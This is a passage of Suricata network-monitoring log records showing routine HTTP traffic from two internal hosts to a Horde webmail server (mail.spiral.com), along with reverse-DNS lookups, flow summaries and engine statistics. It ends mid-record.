{"timestamp":"2020-02-29T00:11:19.028862+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8528}} {"timestamp":"2020-02-29T00:11:19.245557+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52720,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8528},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36696,"tx_id":0}} {"timestamp":"2020-02-29T00:11:19.256442+0000","flow_id":316799676049850,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46411,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":34464,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:19.364994+0000","flow_id":316799676049850,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46411,"proto":"UDP","dns":{"type":"answer","id":34464,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:19.364994+0000","flow_id":316799676049850,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46411,"proto":"UDP","dns":{"type":"answer","id":34464,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:19.435239+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":885},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":1}} {"timestamp":"2020-02-29T00:11:19.437553+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":955}} {"timestamp":"2020-02-29T00:11:20.000581+0000","event_type":"stats","stats":{"uptime":14332,"capture":{"kernel_packets":134594,"kernel_drops":0},"decoder":{"pkts":134594,"bytes":92874547,"invalid":185,"ipv4":133109,"ipv6":8,"ethernet":134594,"raw":0,"null":0,"sll":0,"tcp":127877,"udp":5032,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2743,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2759,"synack":2750,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1783,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2297,"failed_udp":111},"tx":{"http":4593,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2376}},"flow_mgr":{"closed_pruned":2726,"new_pruned":15,"est_pruned":2350,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20169,"memcap_state":0,"memcap_global":0},"http":{"memuse":84300,"memcap":0}}} {"timestamp":"2020-02-29T00:11:22.863642+0000","flow_id":909784335920538,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46116,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26215,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:22.975027+0000","flow_id":909784335920538,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46116,"proto":"UDP","dns":{"type":"answer","id":26215,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:22.975027+0000","flow_id":909784335920538,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46116,"proto":"UDP","dns":{"type":"answer","id":26215,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:23.010667+0000","flow_id":563408108453862,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34794,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50}} {"timestamp":"2020-02-29T00:11:23.010667+0000","flow_id":563408108453862,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34794,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:11:24.438797+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52720,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":955},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2478,"tx_id":1}} {"timestamp":"2020-02-29T00:11:26.519207+0000","flow_id":788838057176103,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46659,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2913,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:26.627443+0000","flow_id":788838057176103,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46659,"proto":"UDP","dns":{"type":"answer","id":2913,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:26.627443+0000","flow_id":788838057176103,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46659,"proto":"UDP","dns":{"type":"answer","id":2913,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:26.701011+0000","flow_id":1771509394621068,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412}} {"timestamp":"2020-02-29T00:11:26.701011+0000","flow_id":1771509394621068,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:11:27.000184+0000","event_type":"stats","stats":{"uptime":14339,"capture":{"kernel_packets":134631,"kernel_drops":0},"decoder":{"pkts":134632,"bytes":92889142,"invalid":185,"ipv4":133147,"ipv6":8,"ethernet":134632,"raw":0,"null":0,"sll":0,"tcp":127911,"udp":5036,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2744,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2760,"synack":2751,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1785,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2299,"failed_udp":111},"tx":{"http":4595,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2378}},"flow_mgr":{"closed_pruned":2726,"new_pruned":15,"est_pruned":2350,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20830,"memcap_state":0,"memcap_global":0},"http":{"memuse":78960,"memcap":0}}} {"timestamp":"2020-02-29T00:11:28.014904+0000","flow_id":563408108453862,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34794,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":30,"tx_id":0}} {"timestamp":"2020-02-29T00:11:31.000765+0000","flow_id":1641341801378157,"event_type":"flow","src_ip":"192.168.10.122","src_port":43136,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:30.700781+0000","end":"2020-02-29T00:06:30.811812+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:31.702838+0000","flow_id":1771509394621068,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52722,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":757,"tx_id":0}} {"timestamp":"2020-02-29T00:11:31.748325+0000","flow_id":480248952220453,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48196,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13638,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:31.856514+0000","flow_id":480248952220453,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48196,"proto":"UDP","dns":{"type":"answer","id":13638,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:31.856514+0000","flow_id":480248952220453,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48196,"proto":"UDP","dns":{"type":"answer","id":13638,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:32.000674+0000","flow_id":1124421027940285,"event_type":"flow","src_ip":"192.168.10.81","src_port":52714,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1095,"bytes_toclient":6725,"start":"2020-02-29T00:10:26.051133+0000","end":"2020-02-29T00:10:31.236100+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:32.016594+0000","flow_id":146057546899732,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34796,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6624}} {"timestamp":"2020-02-29T00:11:34.000232+0000","event_type":"stats","stats":{"uptime":14346,"capture":{"kernel_packets":134652,"kernel_drops":0},"decoder":{"pkts":134664,"bytes":92900687,"invalid":185,"ipv4":133179,"ipv6":8,"ethernet":134664,"raw":0,"null":0,"sll":0,"tcp":127939,"udp":5040,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2746,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2762,"synack":2753,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1787,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2301,"failed_udp":111},"tx":{"http":4597,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2380}},"flow_mgr":{"closed_pruned":2727,"new_pruned":15,"est_pruned":2351,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65531,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20830,"memcap_state":0,"memcap_global":0},"http":{"memuse":74685,"memcap":0}}} {"timestamp":"2020-02-29T00:11:34.034672+0000","flow_id":16980894975856,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59771,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":46822,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:34.142465+0000","flow_id":16980894975856,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59771,"proto":"UDP","dns":{"type":"answer","id":46822,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:34.142465+0000","flow_id":16980894975856,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59771,"proto":"UDP","dns":{"type":"answer","id":46822,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:34.295285+0000","flow_id":128482540935253,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34798,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6982}} {"timestamp":"2020-02-29T00:11:35.996627+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":192}} {"timestamp":"2020-02-29T00:11:35.996750+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:11:35.999895+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":192},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","state":"CLOSED","stored":false,"size":192,"tx_id":0}} {"timestamp":"2020-02-29T00:11:35.999800+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":0}} {"timestamp":"2020-02-29T00:11:36.001784+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":213}} {"timestamp":"2020-02-29T00:11:36.003246+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":213},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/unseen-inv.png","state":"CLOSED","stored":false,"size":213,"tx_id":1}} {"timestamp":"2020-02-29T00:11:36.013992+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} {"timestamp":"2020-02-29T00:11:36.023877+0000","flow_id":1911890401320261,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60822,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7550,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:36.041297+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reply.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":248}} {"timestamp":"2020-02-29T00:11:36.054763+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/delete.png","state":"CLOSED","stored":false,"size":312,"tx_id":2}} {"timestamp":"2020-02-29T00:11:36.132194+0000","flow_id":1911890401320261,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60822,"proto":"UDP","dns":{"type":"answer","id":7550,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:36.132194+0000","flow_id":1911890401320261,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60822,"proto":"UDP","dns":{"type":"answer","id":7550,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:36.211121+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1840}} {"timestamp":"2020-02-29T00:11:36.211121+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 